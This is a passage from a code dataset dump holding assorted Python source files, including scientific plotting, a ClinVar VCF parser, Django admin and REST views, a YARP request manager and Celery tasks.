unittest.main()\n","sub_path":"colour/algebra/tests/tests_matrix.py","file_name":"tests_matrix.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"559432667","text":"import re\nimport os\nj=0\npath=\"/home/fereshteh/kaist/sanitized_annotations/\"\nfor filename in sorted(os.listdir(path)):\n    \n    filename3=filename\n    filename3 = re.sub('.txt',\".png\",str(filename3))\n    filename2 = re.sub('_',\"/\",str(filename))\n    filename = re.sub('/I',\"/visible/I\",str(filename2))\n    filename = re.sub('.txt',\".jpg\",str(filename))\n    filename1=re.sub('/V000/visible/I[0-9].jpg',\"/images/\",str(filename))\n    filename1 = filename2[:5]+filename2[6:].replace(filename2[6:], \"\")+\"/images/\"\n    filename=str(\"/home/fereshteh/kaist/test/\")+str(filename1)+str(filename)\n    # print(filename)\n    # my_dst=\"/home/fereshteh/kaist/sanitest/\"+'I' + format(j, '05d') + \".png\"\n    # filename = re.sub('.jpg',\".png\",str(filename))\n    my_dst=\"/home/fereshteh/kaist/sanitized_annotations1/sanitized/\"+str(filename3)\n    os.rename(filename, my_dst)\n    j=j+1\n    print(j)\n","sub_path":"dataset-codes/exract_RGBs.py","file_name":"exract_RGBs.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"81334926","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\n\nX = pd.read_csv('Sample5.csv')\nX.head()\n\nlen (X)\nplt.figure(1)\nplt.title('Masa Invariante Sample 5')\n\nplt.hist(X.MT, 50,range = (0,150), color = \"red\")\nplt.xlabel('Masa Transversa $m^2=(E)^2-(p)^2$')\nplt.ylabel('Numero de eventos')\nplt.savefig('GraficaMT.jpg')\nplt.figure(2)\nplt.hist(X.TMI, 300, range = (0,100))\nplt.xlabel('Masa Transversa Invariante $m=sqrt((E)^2-(ip)^2)$')\nplt.ylabel('Numero de eventos')\nplt.savefig('GraficaMTI.jpg')\nplt.show()\n","sub_path":"Measure.py","file_name":"Measure.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"414892349","text":"#!/usr/bin/env python3\n# -*- encoding : utf-8 -*-\n\nimport math\nEARTH_RADIUS = 6378137 # equatorial radius (unit: m)\n# convert degrees to radians (rad)\ndef rad(d):\n    return d * math.pi / 180\n\n'''\nGreat-circle distance in meters between two points given as\n(longitude, latitude) pairs in degrees.\n'''\ndef lantitudeLongitudeDist(lon1,lat1,lon2,lat2):\n    radLon1 = rad(lon1)\n    radLon2 = rad(lon2)\n    radLat1 = rad(lat1)\n    radLat2 = rad(lat2)\n\n    # convert latitudes to colatitudes measured from the north pole\n    if(radLat1 < 0):\n        radLat1 = math.pi / 2 + math.fabs(radLat1) # south\n    else:\n        radLat1 = math.pi /2 - math.fabs(radLat1) # north or equator\n    if(radLat2 < 0):\n        radLat2 = math.pi / 2 + math.fabs(radLat2) # south\n    else:\n        radLat2 = math.pi /2 - math.fabs(radLat2) # north or equator\n    \n    if(radLon1 < 0):\n        radLon1 = 2 * math.pi - math.fabs(radLon1) #west\n    if(radLon2 < 0):\n        radLon2 = 2 * math.pi - math.fabs(radLon2) #west\n    \n    x1 = EARTH_RADIUS * math.cos(radLon1) * math.sin(radLat1)\n    y1 = EARTH_RADIUS * math.sin(radLon1) * math.sin(radLat1)\n    z1 = EARTH_RADIUS * math.cos(radLat1)\n\n    x2 = EARTH_RADIUS * math.cos(radLon2) * math.sin(radLat2)\n    y2 = EARTH_RADIUS * math.sin(radLon2) * math.sin(radLat2)\n    z2 = EARTH_RADIUS * math.cos(radLat2)\n\n    d = math.sqrt((x1-x2)*(x1-x2) + (y1-y2)*(y1-y2) + (z1-z2)*(z1-z2))\n\n    theta = math.acos((EARTH_RADIUS*EARTH_RADIUS + EARTH_RADIUS*EARTH_RADIUS - d*d) / (2 * EARTH_RADIUS * EARTH_RADIUS))\n\n    dist = theta * EARTH_RADIUS\n\n    return dist\n\nif __name__ == \"__main__\":\n    dist = lantitudeLongitudeDist(121.4078568,31.1684894,121.0888802,31.2924345)\n    print(dist)","sub_path":"lant_lon.py","file_name":"lant_lon.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"644152513","text":"address = \"\"\"\r\nMs Alice Smith\r\nApartment 1c\r\n213 Derrick Street \r\nBoston, MA 02130\r\nUSA \r\n\"\"\"\r\n\r\nfrom basics.datatypes import GetZipInfo\r\nimport spacy\r\n\r\nclass ParseAddress:\r\n\r\n    results = {}\r\n\r\n    def find_person_name(self, lines):\r\n        nlp = spacy.load('en_core_web_lg')\r\n        doc = nlp(lines)\r\n        for ent in doc.ents:\r\n            print(ent, ent.label_)\r\n\r\n\r\n    def parse(self, address):\r\n        address_lines = [line for line in address.split('\\n') if line]\r\n        zipobj = GetDetailsFromZip(address)\r\n        city, state, zipcode = zipobj.get_details_from_zip()\r\n        print(city, state, zipcode)\r\n\r\n\r\nclass GetDetailsFromZip:\r\n\r\n    def __init__(self, address):\r\n        self._address = address\r\n\r\n    @property\r\n    def address(self):\r\n        return self._address\r\n\r\n    def get_zipcode(self):\r\n        address_list = [line for line in self.address.split('\\n') if line]\r\n        for i in range(len(address_list)-1,-1,-1):\r\n            line = address_list[i]\r\n            words = line.split(' ')\r\n            for word in words:\r\n                if len(word) == 5 and word.isnumeric():\r\n                    return word\r\n\r\n    def get_details_from_zip(self):\r\n        zipcode = self.get_zipcode()\r\n        zipobj = GetZipInfo()\r\n        zip = zipobj.get_info_from_zip(zipcode)\r\n        city = zip['city']\r\n        state = zip['state']\r\n        zipcode = zip['zip_code']\r\n        return (city, state, zipcode)\r\n\r\n    \"\"\"\r\n    The below section uses spacy for further processing\r\n    \"\"\"\r\n\r\n\r\n\r\no = ParseAddress()\r\no.parse(address)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"basics/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"264705397","text":"import zmq\nimport cv2\nimport sys\nimport pickle\nimport numpy as np\n\n\ndef collector_stage1(port_send, port_rec):\n    print(\"Collector stage 1 started sending on port \"+port_send + \" Listening to port \" + port_rec)\n    context = zmq.Context()\n    # receive socket setup\n    collector_receiver = context.socket(zmq.PULL)\n    
collector_receiver.bind(\"tcp://127.0.0.1:\"+port_rec)\n # send socket setup\n collector_sender = context.socket(zmq.PUSH)\n collector_sender.bind(\"tcp://*:\"+port_send)\n # main loop\n while True:\n # receive message\n message = pickle.loads(collector_receiver.recv())\n index, frame = message['fnumber'], message['frame']\n # saving the frames received by collector\n cv2.imwrite(\"frames_machine1/frame%d.jpeg\" % index, frame*255)\n frame = frame.astype(np.uint8)\n message = {'fnumber': index, 'frame': frame}\n collector_sender.send(pickle.dumps(message))\n\n\ndef main():\n if len(sys.argv) != 3:\n print(\"Wrong arguments\")\n exit()\n else:\n _,port_send, port_rec = sys.argv\n collector_stage1(port_send,port_rec)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"collector_stage1.py","file_name":"collector_stage1.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"291751892","text":"from base import anor, objtest\nimport unittest\n\nclass TestDelete(unittest.TestCase):\n @objtest()\n def test_removes_position_and_velocity(self, id):\n anor.Mob(id, position=(1, 2, 3), velocity=(-5, 5, 100)).save()\n anor.Mob(id).delete()\n mob = anor.Mob.by_id(id)\n self.assertEqual(mob.id, id)\n self.assertIsNone(mob.position)\n self.assertIsNone(mob.velocity)\n","sub_path":"test/test_delete.py","file_name":"test_delete.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"528792054","text":"from django.db import transaction\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom Assets.models import Properties,GalleryPreset,ExtendedContent,ExtentedType\n\nclass PropertiesAdmin(admin.ModelAdmin):\n \"\"\"A form for creating new users. Includes all the required\n fields, plus a repeated password.\"\"\"\n\n class Meta:\n model = Properties\n\n def save(self, commit=True):\n # Save the provided password in hashed format\n user = super(PropertiesAdmin, self).save(commit=False)\n if commit:\n user.save()\n return user\n\nclass ExtentedTypeAdmin(admin.ModelAdmin):\n \"\"\"A form for creating new users. Includes all the required\n fields, plus a repeated password.\"\"\"\n\n class Meta:\n model = ExtentedType\n\n def save(self, commit=True):\n # Save the provided password in hashed format\n user = super(ExtentedTypeAdmin, self).save(commit=False)\n if commit:\n user.save()\n return user\n\nclass ExtendedContentAdmin(admin.ModelAdmin):\n \"\"\"A form for creating new users. Includes all the required\n fields, plus a repeated password.\"\"\"\n\n class Meta:\n model = ExtendedContent\n\n def save(self, commit=True):\n # Save the provided password in hashed format\n user = super(ExtendedContentAdmin, self).save(commit=False)\n if commit:\n user.save()\n return user\n\nclass GalleryPresetForm(forms.ModelForm):\n class Meta:\n model = GalleryPreset\n widgets = {\n 'properties': forms.SelectMultiple(attrs={'size': 20})\n }\n\nclass GalleryPresetAdmin(admin.ModelAdmin):\n \"\"\"A form for creating new users. 
Includes all the required\n fields, plus a repeated password.\"\"\"\n form = GalleryPresetForm\n class Meta:\n model = GalleryPreset\n\n def save(self, commit=True):\n # Save the provided password in hashed format\n user = super(GalleryPresetAdmin, self).save(commit=False)\n if commit:\n user.save()\n return user\n\n\nadmin.site.register(Properties,PropertiesAdmin)\nadmin.site.register(GalleryPreset,GalleryPresetAdmin)\nadmin.site.register(ExtendedContent,ExtendedContentAdmin)\nadmin.site.register(ExtentedType,ExtentedTypeAdmin)\n","sub_path":"Core/Assets/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"206639422","text":"import logging; logger = logging.getLogger(\"morse.\" + __name__)\nimport sys\nimport yarp\nimport json\nfrom collections import OrderedDict\n\nfrom morse.core.request_manager import RequestManager, MorseRPCInvokationError\nfrom morse.core import status\n\n\nclass YarpRequestManager(RequestManager):\n \"\"\"Implements services to control the MORSE simulator over YARP\n\n The syntax of requests is:\n >>> id component_name service [params with Python syntax]\n\n 'id' is an identifier set by the client to conveniently identify\n the request. It must be less that 80 chars in [a-zA-Z0-9].\n\n The server answers:\n >>> id OK|FAIL result_in_python|error_msg\n\n \"\"\"\n\n def __str__(self):\n return \"Yarp service manager\"\n\n def initialization(self):\n\n # Create dictionaries for the input and output ports\n self._yarp_request_ports = dict()\n self._yarp_reply_ports = dict()\n # Create a dictionary for the port names\n self._component_ports = dict()\n\n # For asynchronous request, this holds the mapping between a\n # request_id and the socket which requested it.\n self._pending_ports = dict()\n\n # Stores for each port the pending results to write back.\n self._results_to_output = dict()\n\n # Create a dictionary for the evailable bottles\n self._in_bottles = dict()\n self._reply_bottles = dict()\n\n return True\n\n\n def finalization(self):\n logger.info(\"Closing yarp request ports...\")\n for port in self._yarp_request_ports.values():\n port.close()\n\n return True\n\n\n def on_service_completion(self, request_id, results):\n port = None\n\n try:\n port, id = self._pending_ports[request_id]\n except KeyError:\n logger.info(str(self) + \": ERROR: I can not find the port which requested \" + request_id)\n return\n\n if port in self._results_to_output:\n self._results_to_output[port].append((id, results))\n else:\n self._results_to_output[port] = [(id, results)]\n\n\n def post_registration(self, component_name, service, is_async):\n \"\"\" Register a connection of a service with YARP \"\"\"\n # Get the Network attribute of yarp,\n # then call its init method\n self._yarp_module = sys.modules['yarp']\n self.yarp_object = self._yarp_module.Network()\n\n # Create the names of the ports\n request_port_name = '/ors/services/{0}/request'.format(component_name)\n reply_port_name = '/ors/services/{0}/reply'.format(component_name)\n\n if not component_name in self._yarp_request_ports.keys():\n # Create the ports to accept and reply to requests\n request_port = self._yarp_module.BufferedPortBottle()\n reply_port = self._yarp_module.BufferedPortBottle()\n request_port.open(request_port_name)\n reply_port.open(reply_port_name)\n self._yarp_request_ports[component_name] = request_port\n self._yarp_reply_ports[component_name] = reply_port\n \n # Create bottles 
to use in the responses\n bottle_in = self._yarp_module.Bottle()\n self._in_bottles[component_name] = bottle_in\n bottle_reply = self._yarp_module.Bottle()\n self._reply_bottles[component_name] = bottle_reply\n\n logger.info(\"Yarp service manager now listening on port \" + request_port_name + \".\")\n logger.info(\"Yarp service manager will reply on port \" + reply_port_name + \".\")\n\n return True\n\n\n def main(self):\n \"\"\" Read commands from the ports, and prepare the response\"\"\" \n # Read data from available ports\n for component_name, port in self._yarp_request_ports.items():\n # Get the bottles to read and write\n bottle_in = self._in_bottles[component_name] \n bottle_reply = self._reply_bottles[component_name] \n bottle_in = port.read(False)\n if bottle_in != None:\n logger.debug(\"Received command from port '%s'\" % (component_name))\n id = 'unknown'\n\n try:\n try:\n id, component_name, service, params = self._parse_request(bottle_in)\n except ValueError: # Request contains < 2 tokens.\n raise MorseRPCInvokationError(\"Malformed request!\")\n\n logger.info(\"Got '%s | %s | %s' (id = %s) from %s\" % (component_name, service, params, id, component_name))\n\n # on_incoming_request returns either \n # (True, result) if it's a synchronous\n # request that has been immediately executed, or\n # (False, request_id) if it's an asynchronous request whose\n # termination will be notified via\n # on_service_completion.\n is_sync, value = self.on_incoming_request(component_name, service, params)\n\n if is_sync:\n if port in self._results_to_output:\n self._results_to_output[port].append((id, value))\n else:\n self._results_to_output[port] = [(id, value)]\n else:\n # Stores the mapping request/socket to notify\n # the right port when the service completes.\n # (cf :py:meth:on_service_completion)\n # Here, 'value' is the internal request id while\n # 'id' is the id used by the socket client.\n self._pending_ports[value] = (port, id)\n\n\n except MorseRPCInvokationError as e:\n if port in self._results_to_output:\n self._results_to_output[port].append((id, (status.FAILED, e.value)))\n else:\n self._results_to_output[port] = [(id, (status.FAILED, e.value))]\n \n if self._results_to_output:\n for component_name, port in self._yarp_request_ports.items():\n if port in self._results_to_output:\n for r in self._results_to_output[port]:\n response = OrderedDict([\n ('id', r[0]),\n ('status', r[1][0]),\n ('reply', (r[1][1] if r[1][1] else \"\")) ])\n #('reply', \"%s\" % str(r[1][1]) if r[1][1] else \"\") ])\n json_response = json.dumps(response)\n # Send the reply through the same yarp port\n reply_port = self._yarp_reply_ports[component_name]\n bottle_reply = reply_port.prepare()\n bottle_reply.clear()\n bottle_reply.addString(json_response)\n reply_port.write()\n logger.debug(\"Sent back '\" + str(response) + \"'. Component: \" + component_name + \". 
Port: \" + str(port))\n \n del self._results_to_output[port]\n\n\n def _parse_request(self, bottle):\n \"\"\"\n Parse the incoming bottle.\n \"\"\"\n try:\n request_msg = bottle.get(0).toString()\n request = json.loads(request_msg, object_pairs_hook=OrderedDict)\n except (IndexError, ValueError) as e:\n raise MorseRPCInvokationError('Malformed request: expected a json econded request with this format: \\'{id:13, component:Motion_Controller, service:goto, params:[5, 5, 0]}\\' (all values enclosed in strings)')\n\n id = request['id']\n component_name = request['component']\n service = request['service']\n try:\n params = request['params']\n import ast\n p = ast.literal_eval(params)\n except (NameError, SyntaxError) as e:\n raise MorseRPCInvokationError(\"Invalid request syntax: error while parsing the parameters. \" + str(e))\n\n return (id, component_name, service, p)\n","sub_path":"src/morse/middleware/yarp_json_request_manager.py","file_name":"yarp_json_request_manager.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"5003622","text":"## 0 - Uncertain significance, 1 - not provided, 2 - Benign, 3 - Likely benign, 4 - Likely pathogenic, 5 - Pathogenic, 6 - drug response, 7 - histocompatibility, 255 - other\ndef clnsig(inF):\n inFile = open(inF)\n ouFile = open(inF.split('.vcf')[0] + '-sig', 'w')\n ouFile2 = open(inF.split('.vcf')[0] + '-sigPatho', 'w')\n ouFile3 = open(inF.split('.vcf')[0] + '-sigPathoDrug', 'w')\n for line in inFile:\n line = line.strip()\n if line[0] != '#':\n fields = line.split('\\t')\n info = fields[7].split(';')\n Tx = []\n gene = []\n for item in info:\n if item.find('GENEINFO=') != -1:\n s = item.split('GENEINFO=')[1]\n for tm in s.split('|'):\n t = tm.split(':')[0]\n gene.append(t)\n\n if item.find('CLNSIG=') != -1:\n s = item.split('CLNSIG=')[1]\n sx = s.split('|')\n if '5' in sx:\n Tx.append('Pathogenic')\n if '4' in sx:\n Tx.append('Likely pathogenic')\n if '6' in sx:\n Tx.append('drug response')\n if '7' in sx:\n Tx.append('histocompatibility')\n if '0' in sx:\n Tx.append('Uncertain significance')\n if '1' in sx:\n Tx.append('not provided')\n if '2' in sx:\n Tx.append('Benign')\n if '3' in sx:\n Tx.append('Likely benign')\n if '255' in sx:\n Tx.append('other')\n\n TxPatho = []\n TxPathoDrug = []\n \n for it in Tx:\n #if it != 'other' and it != 'Uncertain significance' and it!='not provided' and it != 'Benign' and it!='Likely benign':\n if it.find('Pathogenic') != -1 or it.find('pathogenic') != -1 or it.find('drug') != -1 or it.find('histocompatibility') != -1:\n if it not in TxPathoDrug:\n TxPathoDrug.append(it)\n\n for it in Tx:\n if it.find('Pathogenic') != -1: \n TxPatho.append(it)\n elif it.find('Likely pathogenic') != -1 and 'Pathogenic' not in TxPatho:\n TxPatho.append(it)\n \n if gene:\n ouFile.write('\\t'.join(fields[0:5]) + '\\t' + ':'.join(gene) + '\\t' + ';'.join(Tx) + '\\n')\n else:\n ouFile.write('\\t'.join(fields[0:5]) + '\\t' + '.' + '\\t' + ';'.join(Tx) + '\\n')\n\n if gene and TxPatho:\n ouFile2.write('\\t'.join(fields[0:5]) + '\\t' + ':'.join(gene) + '\\t' + ';'.join(TxPatho) + '\\n')\n elif TxPatho:\n ouFile2.write('\\t'.join(fields[0:5]) + '\\t' + '.' + '\\t' + ';'.join(TxPatho) + '\\n')\n\n if gene and TxPathoDrug:\n ouFile3.write('\\t'.join(fields[0:5]) + '\\t' + ':'.join(gene) + '\\t' + ';'.join(TxPathoDrug) + '\\n')\n elif TxPathoDrug:\n ouFile3.write('\\t'.join(fields[0:5]) + '\\t' + '.' 
+ '\\t' + ';'.join(TxPathoDrug) + '\\n')\n\n\n\n\n    inFile.close()\n    ouFile.close()\n    ouFile2.close()\n    ouFile3.close()\n\n#clnsig('clinvar.vcf')\n#clnsig('GRCh38.clinvar.vcf')\nclnsig('GRCh37.clinvar.vcf')\n","sub_path":"Data/Clinvar/OldVer/01-CLNSIG.py","file_name":"01-CLNSIG.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"309737191","text":"import unittest\nfrom lib.RingBuffer import RingBuffer\nimport numpy as np\n\nclass TestRingBuffer(unittest.TestCase):\n\n    def setUp(self):\n        self.q = RingBuffer(11)\n        self.a = np.zeros((1,12))\n    \n    def test_isEmpty(self):\n        self.assertTrue(self.q.isEmapty())\n        self.q.enqueue(1) \n        self.assertFalse(self.q.isEmapty())\n\n    def test_isFull(self):\n        self.assertFalse(self.q.isFull())\n        self.q.enqueue(1)\n        self.assertFalse(self.q.isFull())\n        for i in range(10):\n            self.q.enqueue(i)\n        self.assertTrue(self.q.isFull())\n\n    def test_enqueue(self):\n        self.a[0][0] = 1\n        self.q.enqueue(1)\n        # print(self.a[0])\n        #\n        # print(self.a[0] == self.q.getQueue())\n        result = True\n        for BoolValue in (self.a[0] == self.q.getQueue()):\n            if BoolValue != True:\n                result = False\n                break\n        self.assertTrue(result)\n        for i in range(10):\n            self.q.enqueue(i)\n        self.assertEqual(\"queue overflow\", self.q.enqueue(1))\n\n    def test_dequeue(self):\n        self.q.enqueue(1)\n        self.assertEqual(1, self.q.dequeue())\n        self.assertEqual(\"queue underflow\", self.q.dequeue())\n\n    def test_size(self):\n        self.assertEqual(0, self.q.size())\n        for i in range(11):\n            self.q.enqueue(i)\n            self.assertEqual(i+1, self.q.size())\n        for i in range(11):\n            i = 10 - i\n            self.q.dequeue()\n            self.assertEqual(i, self.q.size())\n\n    def test_peek(self):\n        self.q.enqueue(1)\n        self.assertEqual(1, self.q.peek())\n        self.assertEqual(1, self.q.dequeue())\n    \nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"test/test_ringbuffer.py","file_name":"test_ringbuffer.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"134007347","text":"# -*- coding: utf-8 -*-\n\nimport dsp\nimport matplotlib.pylab as plt\n\n# Sampling Example\n\n# Simulation\nsim = dsp.simulation(500E-6,1E-6,0)\n\n# Sampling\nsm = dsp.sampling(50E3,0E-6,sim.duration,sim.res)\n\n# Waveform\nwavef = dsp.waveform()\n\n# Noise\nns = dsp.signal_info()\nns.snr = 1/5\nns.amp = 1\n\n# Sine\ns1 = dsp.signal_info()\ns1.amp = 5\ns1.freq = 10E3\ns1.phase = 0\n\n# Sampling signal\nsignal = wavef.sine(sim.t,s1.amp,s1.freq,s1.phase) + wavef.noise(ns.amp,len(sim.t))\ndigital_signal = sm.sample_signal(signal)\n\n# Plot\nplt.plot(sim.t,signal,'g',sm.t,digital_signal,'ro')\nplt.show()","sub_path":"Python/Sampling_Example.py","file_name":"Sampling_Example.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"335097754","text":"import requests\nimport json\nfrom requests_kerberos import HTTPKerberosAuth, REQUIRED\n\nAPI_ENDPOINT = 'https://10.0.10.133:8999/batches'\n\nheaders = {\n    'Content-Type': 'application/json'\n}\ndata2 = open('job.json')\njson_data = json.load(data2)\nr = requests.post(url=API_ENDPOINT, data=json.dumps(json_data), headers=headers, auth=HTTPKerberosAuth(mutual_authentication=REQUIRED, sanitize_mutual_error_response=False), verify=False)\n\n\n#r = requests.post(url=API_ENDPOINT, data=json.dumps(json_data), headers=headers, verify=False, auth=HTTPKerberosAuth())\n#r = 
requests.post(url=API_ENDPOINT, data=json.dumps(json_data), headers=headers, verify=True, auth=HTTPKerberosAuth(), cert=['/home/user/yang2/livy.crt'])\n\nprint(r.text)\n","sub_path":"python/yang2/post_work_ssl.py","file_name":"post_work_ssl.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"446699191","text":"letter = 'é'\nfrom os import path\nfrom os import listdir\nfrom os.path import isfile, join\n\nlocale = path.dirname(__file__)\n\ndef encode():\n onlyfiles = [f for f in listdir(locale) if f != \"xml.py\" if isfile(join(locale, f))]\n for i in onlyfiles:\n lst = []\n outfolder = locale + \"\\edited\" + \"\\\\\"\n f = open(i)\n outfile = open(outfolder + i[1:], \"w\")\n for d in f:\n outfile.write(d.replace(letter, \"e\"))\n outfile.close()\n f.close()\n\n#print(locale)\n\nencode()\n","sub_path":"Latest-Distrubution/Assets/Base/Dex/move_data/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"218254556","text":"import datetime\r\nimport os\r\nimport pham.db\r\nimport pham.query\r\nfrom contextlib import closing\r\nfrom webphamerator.app import app, db, models, celery\r\n\r\nclass CallbackObserver(object):\r\n def __init__(self, job_id):\r\n self.job_id = job_id\r\n\r\n def handle_call(self, code, *args, **kwargs):\r\n job_record = db.session.query(models.Job).filter(models.Job.id == self.job_id).first()\r\n if code == pham.db.CallbackCode.status:\r\n message = args[0]\r\n step = args[1]\r\n total_steps = args[2]\r\n job_record.status_message = '{} ({}/{})'.format(message, step, total_steps)\r\n else:\r\n # only report the first error\r\n if job_record.status_code != 'failed':\r\n message = pham.db.message_for_callback(code, *args, **kwargs)\r\n job_record.status_message = message\r\n job_record.status_code = 'failed'\r\n db.session.commit()\r\n\r\n\r\nclass CreateDatabase(celery.Task):\r\n\r\n def _get_server(self):\r\n return pham.db.DatabaseServer.from_url(app.config['SQLALCHEMY_DATABASE_URI'])\r\n\r\n def _get_job(self, job_id):\r\n return db.session.query(models.Job).filter(models.Job.id == job_id).first()\r\n\r\n def _get_database(self, database_id):\r\n return db.session.query(models.Database).filter(models.Database.id == database_id).first()\r\n\r\n def run(self, job_id):\r\n # get job record from the database\r\n job_record = self._get_job(job_id)\r\n database_record = self._get_database(job_record.database_id)\r\n job_record.start_time = datetime.datetime.utcnow()\r\n job_record.modified = datetime.datetime.utcnow()\r\n job_record.seen = False\r\n job_record.status_code = 'running'\r\n job_record.task_id = self.request.id\r\n\r\n genbank_paths = [r.filename for r in job_record.genbank_files_to_add.all()]\r\n organims_ids = [r.organims_id for r in job_record.organism_ids_to_delete.all()]\r\n\r\n # update database with status, status_message, start_time, modified\r\n db.session.commit()\r\n\r\n observer = CallbackObserver(job_id)\r\n success = pham.db.create(self._get_server(), database_record.mysql_name(),\r\n genbank_files=genbank_paths,\r\n cdd_search=database_record.cdd_search,\r\n callback=observer.handle_call)\r\n if not success:\r\n raise RuntimeError\r\n\r\n # export database dump\r\n path = os.path.join(app.config['DATABASE_DUMP_DIR'], database_record.name_slug)\r\n # delete old dump\r\n try:\r\n os.remove(path + '.sql')\r\n except OSError:\r\n pass\r\n 
try:\r\n os.remove(path + '.md5sum')\r\n except OSError:\r\n pass\r\n try:\r\n os.remove(path + '.version')\r\n except OSError:\r\n pass\r\n\r\n pham.db.export(self._get_server(), database_record.mysql_name(), path + '.sql')\r\n\r\n def on_failure(self, exc, task_id, args, kwargs, einfo):\r\n job_id = args[0]\r\n job_record = self._get_job(job_id)\r\n database_record = self._get_database(job_record.database_id)\r\n if job_record.status_code != 'failed':\r\n job_record.status_code = 'failed'\r\n job_record.status_message = 'An unexpected error occurred.'\r\n\r\n if not isinstance(exc, pham.db.DatabaseAlreadyExistsError):\r\n pham.db.delete(self._get_server(), database_record.mysql_name())\r\n db.session.delete(database_record)\r\n\r\n self.always(job_record)\r\n\r\n def on_success(self, return_value, task_id, args, kwargs):\r\n job_id = args[0]\r\n job_record = self._get_job(job_id)\r\n database_record = self._get_database(job_record.database_id)\r\n job_record.status_code = 'success'\r\n job_record.status_message = 'Database created.'\r\n\r\n database_record.visible = True\r\n database_record.locked = False\r\n database_record.created = datetime.datetime.utcnow()\r\n database_record.modified = datetime.datetime.utcnow()\r\n server = pham.db.DatabaseServer.from_url(app.config['SQLALCHEMY_DATABASE_URI'])\r\n with closing(server.get_connection(database=database_record.mysql_name())) as cnx:\r\n database_record.number_of_organisms = pham.query.count_phages(cnx)\r\n database_record.number_of_phams = pham.query.count_phams(cnx)\r\n\r\n self.always(job_record)\r\n\r\n def always(self, job_record):\r\n if job_record.start_time is None:\r\n job_record.runtime = datetime.datetime.utcnow() - job_record.modified\r\n else:\r\n job_record.runtime = datetime.datetime.utcnow() - job_record.start_time\r\n job_record.modified = datetime.datetime.utcnow()\r\n job_record.seen = False\r\n\r\n # delete genbank files\r\n for file_record in job_record.genbank_files_to_add.all():\r\n try:\r\n os.remove(file_record.filename)\r\n except IOError:\r\n pass\r\n file_record.filename = None\r\n\r\n db.session.commit()\r\n","sub_path":"webphamerator/app/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255041932","text":"import tempfile\n\nimport requests\n\nfrom django.http import Http404\nfrom rest_framework import status, mixins\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom substrapp.models import Algo\nfrom substrapp.serializers import LedgerAlgoSerializer, AlgoSerializer\nfrom substrapp.utils import queryLedger, get_hash\nfrom substrapp.views.utils import get_filters, getObjectFromLedger, ComputeHashMixin, ManageFileMixin, JsonException, find_primary_key_error\n\n\nclass AlgoViewSet(mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.ListModelMixin,\n ComputeHashMixin,\n ManageFileMixin,\n GenericViewSet):\n queryset = Algo.objects.all()\n serializer_class = AlgoSerializer\n ledger_query_call = 'queryAlgo'\n\n def perform_create(self, serializer):\n return serializer.save()\n\n def create(self, request, *args, **kwargs):\n data = request.data\n\n file = data.get('file')\n pkhash = get_hash(file)\n serializer = self.get_serializer(data={\n 'pkhash': pkhash,\n 'file': file,\n 'description': data.get('description')\n })\n\n 
try:\n serializer.is_valid(raise_exception=True)\n except Exception as e:\n st = status.HTTP_400_BAD_REQUEST\n if find_primary_key_error(e):\n st = status.HTTP_409_CONFLICT\n return Response({'message': e.args, 'pkhash': pkhash}, status=st)\n else:\n\n # create on db\n try:\n instance = self.perform_create(serializer)\n except Exception as exc:\n return Response({'message': exc.args},\n status=status.HTTP_400_BAD_REQUEST)\n else:\n # init ledger serializer\n ledger_serializer = LedgerAlgoSerializer(data={'name': data.get('name'),\n 'permissions': data.get('permissions', 'all'),\n 'instance': instance},\n context={'request': request})\n if not ledger_serializer.is_valid():\n # delete instance\n instance.delete()\n raise ValidationError(ledger_serializer.errors)\n\n # create on ledger\n data, st = ledger_serializer.create(ledger_serializer.validated_data)\n\n if st not in (status.HTTP_201_CREATED, status.HTTP_202_ACCEPTED, status.HTTP_408_REQUEST_TIMEOUT):\n return Response(data, status=st)\n\n headers = self.get_success_headers(serializer.data)\n d = dict(serializer.data)\n d.update(data)\n return Response(d, status=st, headers=headers)\n\n def create_or_update_algo(self, algo, pk):\n try:\n # get algo description from remote node\n url = 